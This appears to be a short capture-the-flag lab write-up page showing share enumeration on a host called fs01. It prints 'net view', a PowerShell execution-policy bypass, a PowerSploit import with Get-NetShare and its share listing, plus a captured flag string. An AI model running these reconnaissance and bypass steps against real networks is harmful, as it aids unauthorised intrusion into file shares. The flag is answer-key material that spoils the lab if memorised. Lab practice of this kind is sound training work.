<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>3 flag</title>
</head><body><br/>
while enumeration on \\fs01 share, found other directories,<br/>
<br/>
net view \\fs01 /all<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
<br/>
<br/>
RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}<br/>
<br/>
<br/>
Also use powersploit scripts to enumerate,<br/>
<br/>
powershell -ep bypass<br/>
Import-module ./PowerSploit.psd1<br/>
<br/>
PS C:\users\bowen\gg&gt; Get-NetShare \\fs01<br/>
Get-NetShare \\fs01<br/>
<br/>
shi1_netname &nbsp;shi1_type shi1_remark &nbsp; ComputerName<br/>
------------ &nbsp;--------- ----------- &nbsp; ------------<br/>
ADMIN$ &nbsp; &nbsp; &nbsp; &#09;2147483648&#09; Remote Admin &nbsp;&#09;\\fs01 &nbsp; &nbsp; &nbsp;<br/>
C$ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#09;2147483648 &#09; Default share &#09;\\fs01 &nbsp; &nbsp; &nbsp;<br/>
finance &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#09;&#09;&#09;&#09;&#09;\\fs01 &nbsp; &nbsp; &nbsp;<br/>
home$ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#09;&#09;&#09;&#09;&#09;\\fs01 &nbsp; &nbsp; &nbsp;<br/>
IPC$ &nbsp; &nbsp; &nbsp; &nbsp; &#09;2147483651 R&#09;emote IPC &nbsp; &#09; \\fs01 </body></html>